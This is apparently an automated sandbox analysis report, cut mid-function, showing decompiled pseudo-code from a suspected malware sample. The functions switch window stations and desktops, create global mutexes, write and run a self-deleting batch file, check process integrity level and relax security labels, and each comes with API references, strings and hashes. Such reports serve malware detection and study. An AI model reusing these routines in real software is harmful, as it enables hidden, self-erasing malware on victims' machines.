								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x004046f6
0x004046fd
0x004046ff
0x00404701
0x00404707
0x0040471a
0x0040471d
0x00404720
0x0040472d
0x00404735
0x00404740
0x0040475f
0x00404763
0x00404766
0x00404784
0x00404784
0x00404787
0x004047a7
0x00000000
0x00404789
0x00404789
0x00404789
0x0040478a
0x004047a2
0x0040478c
0x0040478c
0x0040478c
0x0040478d
0x0040479a
0x00000000
0x0040478f
0x0040478f
0x00404790
0x00000000
0x00000000
0x00404790
0x0040478d
0x0040478a
0x00404768
0x00404768
0x0040477f
0x0040477f
0x00000000
0x0040476a
0x0040476b
0x0040476b
0x0040476c
0x00000000
0x0040476e
0x0040476f
0x0040476f
0x00404770
0x00404792
0x00404792
0x00000000
0x00404772
0x00404772
0x00404772
0x00404775
0x0040479d
0x0040479d
0x00404777
0x00404777
0x00404777
0x00404778
0x00404795
0x00404795
0x0040477a
0x0040477a
0x0040477b
0x004047aa
0x004047aa
0x004047aa
0x0040477b
0x00404778
0x00404775
0x00404770
0x0040476c
0x00404768
0x00404742
0x00404742
0x00404745
0x0040474b
0x00404751
0x00404754
0x00404757
0x0040475a
0x0040475a
0x004047b1
0x004047b9
0x004047cb
0x004047df
0x004047df
0x00000000
0x00404803
0x004047b9
0x0040480d

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404701
ReleaseMutex.KERNEL32(?), ref: 00404720
GetWindowRect.USER32 ref: 0040472D
IsRectEmpty.USER32 ref: 004047B1
GetWindowLongW.USER32(?,000000F0), ref: 004047C0
GetParent.USER32(?), ref: 004047D6
MapWindowPoints.USER32 ref: 004047DF
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00404803

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 267f3a6f7eae89cabf796cbc9ee39d2a232669616eced5962cf15f01474e9b7d
Instruction ID: 5f3d6a66af2064ea38c4a41e760b8cbe0f0ceb55628de8e0c7c116a64fab63a7
Opcode Fuzzy Hash: 267f3a6f7eae89cabf796cbc9ee39d2a232669616eced5962cf15f01474e9b7d
Instruction Fuzzy Hash: 85415FB580020AAFCB209FA8C9499BFBBB5FB85314F10457AE611F32E0D7789D40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00419557 Relevance: 12.1, APIs: 8, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419557(void* __ecx, void* __eflags, intOrPtr _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				short _v28;
				void* __esi;
				int _t28;
				void* _t32;
				struct HWINSTA__* _t33;
				struct HDESK__* _t36;

				_t32 = __ecx;
				_v5 = 0;
				E00412F05(0xa1,  &_v28);
				_t33 = OpenWindowStationW( &_v28, 0, 0x10000000);
				if(_t33 != 0) {
					L2:
					_v12 = GetProcessWindowStation();
					if(E004194EB(_t39, _t33) == 0) {
						L10:
						CloseWindowStation(_t33);
						L11:
						return _v5;
					}
					_t36 = E00419513(_a4);
					_t41 = _t36;
					if(_t36 == 0) {
						L8:
						_t45 = _v12;
						if(_v12 != 0) {
							E004194EB(_t45, _v12);
						}
						goto L10;
					}
					if(E004194A6(_t32, _t41, GetThreadDesktop(GetCurrentThreadId()), _t36) != 0) {
						L6:
						_v5 = 1;
						L7:
						CloseDesktop(_t36);
						if(_v5 != 0) {
							goto L10;
						}
						goto L8;
					}
					_t28 = SetThreadDesktop(_t36);
					_v5 = 0;
					if(_t28 == 0) {
						goto L7;
					}
					goto L6;
				}
				_t33 = CreateWindowStationW( &_v28, 0, 0x10000000, 0);
				_t39 = _t33;
				if(_t33 == 0) {
					goto L11;
				}
				goto L2;
			}

0x00419557
0x0041956a
0x0041956d
0x00419583
0x00419587
0x0041959c
0x004195a3
0x004195ad
0x00419600
0x00419601
0x00419607
0x0041960e
0x0041960e
0x004195b7
0x004195b9
0x004195bb
0x004195f3
0x004195f3
0x004195f6
0x004195fb
0x004195fb
0x00000000
0x004195f6
0x004195d3
0x004195e3
0x004195e3
0x004195e7
0x004195e8
0x004195f1
0x00000000
0x00000000
0x00000000
0x004195f1
0x004195d6
0x004195dc
0x004195e1
0x00000000
0x00000000
0x00000000
0x004195e1
0x00419596
0x00419598
0x0041959a
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 0041957D
CreateWindowStationW.USER32 ref: 00419590
GetProcessWindowStation.USER32(?,0041B958,?,2937498D,?,00000000), ref: 0041959C
GetCurrentThreadId.KERNEL32 ref: 004195BD
GetThreadDesktop.USER32(00000000,?,0041B958,?,2937498D,?,00000000), ref: 004195C4
SetThreadDesktop.USER32(00000000,00000000,00000000,?,0041B958,?,2937498D,?,00000000), ref: 004195D6
CloseDesktop.USER32(00000000,00000000,00000000,?,0041B958,?,2937498D,?,00000000), ref: 004195E8
CloseWindowStation.USER32(00000000,00000000,?,0041B958,?,2937498D,?,00000000), ref: 00419601

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: StationWindow$DesktopThread$Close$CreateCurrentOpenProcess
String ID:
API String ID: 2317728530-0
Opcode ID: 1b7baad3e04bed0ed3cea3a69abbdee6d2f1b52a62c8d54770364d7362709d2b
Instruction ID: 96106fae2c35cacd2a725dcd526a1b5ebcc3a43ca6d326bb063abe88784a748e
Opcode Fuzzy Hash: 1b7baad3e04bed0ed3cea3a69abbdee6d2f1b52a62c8d54770364d7362709d2b
Instruction Fuzzy Hash: C011CD728042457BDF11ABB59D98ADF7E69AF05385F04006AF901B3222C6398D86C678

Uniqueness

Uniqueness Score: -1.00%

Function 00407A8F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00407A8F(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t37;
				void* _t39;
				void* _t42;
				void* _t45;
				void* _t46;
				void* _t53;
				void* _t58;
				void* _t63;
				void* _t71;
				WCHAR* _t75;
				void* _t76;
				void* _t80;
				void* _t81;

				_t71 = __edx;
				_t65 = __ecx;
				_t22 = E00419DD8(__ecx, __eflags, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E00419F02();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E0040BE5B(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x421d2c, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E0041B1E6(_t65);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t63 = E0040E2AD( &_v16, _t71, __eflags, _t28, 2, 0x20000000);
						_v20 = _t63;
						__eflags = _t63;
						if(__eflags == 0) {
							L21:
							E0040868F(_v20);
							E0040868F(_v24);
							goto L22;
						}
						_t65 = _v16;
						_t33 = E004077A9(_v16, __eflags, _t63);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E004095E6(_t63, 1);
							_v12 = E004095E6(_t63, 2);
							_t37 = E00409B31(_t63, E004092EF(_t63));
							_t69 = _v8;
							_t39 = E00409B31(_t69, E004092EF(_v8));
							_t70 = _v12;
							_push(E00409B31(_t70, E004092EF(_v12)));
							_push(_t39);
							_push(_t37);
							_push(L"Global\\%08X%08X%08X");
							_t71 = 0x20;
							_t75 =  &_v92;
							_t42 = E00409450(_t41, _t71, _t75);
							_t81 = _t81 + 0x10;
							__eflags = _t42 - 0x1f;
							if(_t42 != 0x1f) {
								goto L20;
							}
							_t45 = CreateMutexW(0x4218a0, 1, _t75);
							__eflags = _t45;
							if(_t45 == 0) {
								_t80 = 0;
								__eflags = 0;
							} else {
								_t80 = E0040BE6B(_t45);
							}
							__eflags = _t80;
							if(_t80 != 0) {
								_t46 = 0x10;
								_t76 = E0040865F(_t46);
								__eflags = _t76;
								if(_t76 == 0) {
									L19:
									E0040BE5B(_t80);
									goto L20;
								}
								 *_t76 = E00408AEF(_t47 | 0xffffffff, _t63);
								 *(_t76 + 4) = E00408AEF(_t49 | 0xffffffff, _v8);
								_t53 = E00408AEF(_t51 | 0xffffffff, _v12);
								__eflags =  *_t76;
								 *(_t76 + 8) = _t53;
								 *(_t76 + 0xc) = _t80;
								if( *_t76 == 0) {
									L18:
									E0040868F( *_t76);
									E0040868F( *(_t76 + 4));
									E0040868F( *(_t76 + 8));
									E0040868F(_t76);
									goto L19;
								}
								__eflags =  *(_t76 + 4);
								if( *(_t76 + 4) == 0) {
									goto L18;
								}
								__eflags = _t53;
								if(_t53 == 0) {
									goto L18;
								}
								_t58 = E0040A0C9(0x80000, E004078C6, _t76);
								__eflags = _t58;
								if(_t58 > 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t65 = _t63;
							_t63 = E004095E6(_t63, 3);
							__eflags = _t63;
						} while (_t63 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x421d2c, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x00407a8f
0x00407a8f
0x00407a9c
0x00407aa1
0x00407aa6
0x00407ab7
0x00407abd
0x00407ac2
0x00407ac4
0x00407c71
0x00407c74
0x00407c79
0x00000000
0x00407c79
0x00407ad5
0x00407adb
0x00407ae0
0x00000000
0x00000000
0x00407ae9
0x00407ae9
0x00407aee
0x00407af1
0x00407af3
0x00000000
0x00000000
0x00407b09
0x00407b0b
0x00407b0e
0x00407b10
0x00407c42
0x00407c45
0x00407c4d
0x00000000
0x00407c4d
0x00407b16
0x00407b1a
0x00407b1f
0x00407b21
0x00000000
0x00000000
0x00000000
0x00000000
0x00407b27
0x00407b27
0x00407b34
0x00407b3e
0x00407b48
0x00407b4d
0x00407b59
0x00407b5e
0x00407b6f
0x00407b70
0x00407b71
0x00407b72
0x00407b79
0x00407b7a
0x00407b7d
0x00407b82
0x00407b85
0x00407b88
0x00000000
0x00000000
0x00407b98
0x00407b9e
0x00407ba0
0x00407bab
0x00407bab
0x00407ba2
0x00407ba7
0x00407ba7
0x00407bad
0x00407baf
0x00407bb3
0x00407bb9
0x00407bbb
0x00407bbd
0x00407c29
0x00407c2a
0x00000000
0x00407c2a
0x00407bcb
0x00407bd8
0x00407bde
0x00407be3
0x00407be6
0x00407be9
0x00407bec
0x00407c0c
0x00407c0e
0x00407c16
0x00407c1e
0x00407c24
0x00000000
0x00407c24
0x00407bee
0x00407bf2
0x00000000
0x00000000
0x00407bf4
0x00407bf6
0x00000000
0x00000000
0x00407c03
0x00407c08
0x00407c0a
0x00000000
0x00000000
0x00000000
0x00407c0a
0x00407c2f
0x00407c31
0x00407c38
0x00407c3a
0x00407c3a
0x00000000
0x00407c52
0x00407c5d
0x00407c63
0x00407c63
0x00000000
0x00407c70
0x00000000

APIs

Part of subcall function 00419DD8: CreateMutexW.KERNEL32(004218A0,00000000,?,?,?,?), ref: 00419DF9

GetCurrentThread.KERNEL32 ref: 00407AB0
SetThreadPriority.KERNEL32(00000000), ref: 00407AB7
WaitForSingleObject.KERNEL32(0000EA60), ref: 00407AD5
CreateMutexW.KERNEL32(004218A0,00000001,?,20000000), ref: 00407B98

Strings

Global\%08X%08X%08X, xrefs: 00407B72

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CreateMutexThread$CurrentObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 2864646380-3239447729
Opcode ID: 8d4fceec86914e59fa11a510a0e34008d7c2cbe520c25452e8d2ddbd2a439055
Instruction ID: 2735165e74ef7bc66f82f227d67bd8b3cba97b3593a888d489fe33498bee2d68
Opcode Fuzzy Hash: 8d4fceec86914e59fa11a510a0e34008d7c2cbe520c25452e8d2ddbd2a439055
Instruction Fuzzy Hash: 5241F870A0820677EB117BB28D46AAF7765AF00714F140A3FF510B61D2CF7DAC41866D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A154 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A154(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0040DAB8(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E004094DE( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0040DA97( &_v592);
					goto L7;
				}
				_t35 = E0040D8AB( &_v592, _a4, _t31);
				E0040868F(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E00409450( &_v592, 0x10e,  &_v1392,  &M00403344) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E00408742( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E00409F5D( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x0040a170
0x0040a262
0x00000000
0x0040a262
0x0040a184
0x0040a190
0x0040a1a8
0x0040a256
0x0040a25d
0x00000000
0x0040a25d
0x0040a1ba
0x0040a1c4
0x0040a1cc
0x00000000
0x00000000
0x0040a1d2
0x0040a1d9
0x0040a1f5
0x00000000
0x0040a216
0x0040a218
0x0040a220
0x0040a228
0x0040a240
0x0040a243
0x00000000
0x0040a251

APIs

Part of subcall function 0040DAB8: GetTempPathW.KERNEL32(000000F6,?), ref: 0040DACF

CharToOemW.USER32 ref: 0040A184

Part of subcall function 0040D8AB: CreateFileW.KERNEL32(0040A16E,40000000,00000001,00000000,00000002,00000080,00000000,00000000,?,?,0040DB2B,0040A16E,00000000,00000000,0040A16E,?), ref: 0040D8C5
Part of subcall function 0040D8AB: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,0040DB2B,0040A16E,00000000,00000000,0040A16E,?), ref: 0040D8E8
Part of subcall function 0040D8AB: CloseHandle.KERNEL32(00000000,?,?,0040DB2B,0040A16E,00000000,00000000,0040A16E,?), ref: 0040D8F5

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000), ref: 0040A208

Strings

bat, xrefs: 0040A164
ComSpec, xrefs: 0040A203
@echo off%sdel /F "%s", xrefs: 0040A197
/c "%s", xrefs: 0040A1DA

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 135ba04f7d9cdd86252d4577c06c7b16dcf415a0b65c4a36dd9880f0a06f21b4
Instruction ID: e31f51e5fbc3cf509147b1a64f17d13241f4515561a9fa1c48d923f6a4783c49
Opcode Fuzzy Hash: 135ba04f7d9cdd86252d4577c06c7b16dcf415a0b65c4a36dd9880f0a06f21b4
Instruction Fuzzy Hash: C021B471901208AADF10EBA4CC45FEE77BCEF04304F2444B7BA08F21D1D6399B898B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEA Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00409DEA(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E0040865F(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E0040868F(_t32);
					goto L12;
				}
			}

0x00409df8
0x00409e02
0x00409e98
0x00409e9c
0x00409e9c
0x00409e1e
0x00409e8e
0x00409e91
0x00000000
0x00409e2b
0x00409e34
0x00409e38
0x00409e8d
0x00000000
0x00409e8d
0x00409e4b
0x00409e4f
0x00409e57
0x00409e59
0x00409e5d
0x00409e66
0x00409e6e
0x00409e77
0x00409e82
0x00409e84
0x00409e79
0x00409e79
0x00409e79
0x00409e77
0x00409e6e
0x00409e5d
0x00409e57
0x00409e88
0x00000000
0x00409e88

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00409DFA
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00409E1A
GetLastError.KERNEL32 ref: 00409E20
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00409E47
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00409E4F
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00409E66
CloseHandle.KERNEL32(?), ref: 00409E91

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: 2e886cc56759fa3999a11006fc44d030faeb5617aec4ade22fc1fc6e74f6edd6
Instruction ID: b917c4107c1a8f27f3b2d36e172e8a0ed65776120f46716d25198a32f026d4ef
Opcode Fuzzy Hash: 2e886cc56759fa3999a11006fc44d030faeb5617aec4ade22fc1fc6e74f6edd6
Instruction Fuzzy Hash: 66117F35540148AFEB119BA0DD84EAF3B6DEB45344F200476F941F61E1D73A9E81E6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBF1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CBF1(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0040CA55(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x0040cc16
0x0040cc19
0x0040cc1b
0x0040cc1d
0x0040cc26
0x0040cc29
0x0040cc32
0x0040cc4f
0x00000000
0x0040cc51
0x0040cc54
0x0040cc5a
0x0040cc67
0x00000000
0x00000000
0x00000000
0x0040cc5a
0x0040cc6b
0x0040cc6e
0x00000000
0x0040cc5c
0x0040cc5c
0x0040cc5f
0x00000000
0x0040cc65
0x0040cc71
0x0040cc77

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0040CC19

Part of subcall function 0040CA55: CharUpperW.USER32(00000000), ref: 0040CB77

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?), ref: 0040CC4B
RegCloseKey.ADVAPI32(?), ref: 0040CC54
RegCloseKey.ADVAPI32(?), ref: 0040CC6E

Strings

d, xrefs: 0040CC5F
SOFTWARE\Microsoft, xrefs: 0040CC0C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: f0d881cb236116a017b729c7872c277984f390046766e29fa4c30051a4241638
Instruction ID: 859abb771524678f0aefde456b228e035ca16e56f1007f95f98b06b2db0718db
Opcode Fuzzy Hash: f0d881cb236116a017b729c7872c277984f390046766e29fa4c30051a4241638
Instruction Fuzzy Hash: 5D1139B190420CFEEB019BA4DDC0EEFBBBCEB05788F104176F601B21A1D2759E459BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD0A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040BD0A(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E00409D62(L"SeSecurityPrivilege");
				_push(0);
				_t11 =  &_v12;
				_push(_t11);
				_push(1);
				_push(L"S:(ML;CIOI;NRNWNX;;;LW)");
				L0041C138();
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0040bd16
0x0040bd18
0x0040bd1d
0x0040bd1e
0x0040bd21
0x0040bd22
0x0040bd24
0x0040bd29
0x0040bd30
0x0040bd41
0x0040bd44
0x0040bd4c
0x0040bd5b
0x0040bd63
0x0040bd65
0x0040bd65
0x0040bd63
0x0040bd6a
0x0040bd6a
0x0040bd74

APIs

Part of subcall function 00409D62: GetCurrentThread.KERNEL32 ref: 00409D72
Part of subcall function 00409D62: OpenThreadToken.ADVAPI32(00000000,?,?,?,0040BD1D,SeSecurityPrivilege,00000000), ref: 00409D79
Part of subcall function 00409D62: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,0040BD1D,SeSecurityPrivilege,00000000), ref: 00409D8B

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040BD29
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000,SeSecurityPrivilege,00000000), ref: 0040BD44
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040BD5B
LocalFree.KERNEL32(00000000), ref: 0040BD6A

Strings

SeSecurityPrivilege, xrefs: 0040BD11
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 0040BD24

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 078fd291ef4c02050416049a6a0b7c182decbfb383cf9f3eb4759e7f3d294954
Instruction ID: 47b25ec114bd907bb3059a1955a32ed3c6b1c39175bd1d7862f95a6839232256
Opcode Fuzzy Hash: 078fd291ef4c02050416049a6a0b7c182decbfb383cf9f3eb4759e7f3d294954
Instruction Fuzzy Hash: 24F0317554020CBEEB119FA08D81EEF7B7CEF04748F000077B941F11A1D7759E509A68

Uniqueness

Uniqueness Score: -1.00%

Function 004048ED Relevance: 9.2, APIs: 6, Instructions: 198
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004048ED(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t66;
				signed int _t67;
				signed short _t76;
				void* _t80;

				_t71 = __ecx;
				_push(__ecx);
				_t76 = _a16;
				_t80 = __eax;
				if(_t76 == 0x201 || _t76 == 0x207 || _t76 == 0x204) {
					_t66 = GetAncestor(_a4, 2);
					if(_t66 ==  *(_t80 + 0x170)) {
						goto L8;
					}
					_t71 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t66, (_t76 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t80 + 0x170) = _t66;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t67 = _a12 & 0x0000ffff;
					_v8 = _t67;
					PostMessageW(_a4, 0x20, _a4, (_t76 & 0x0000ffff) << 0x00000010 | _t67);
					if(_a12 != 1) {
						_t47 = E0040480E(_t71, _t80, _a4, _a20);
						__eflags = _t67 - 8;
						_a20 = _t47;
						if(__eflags > 0) {
							__eflags = _t67 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
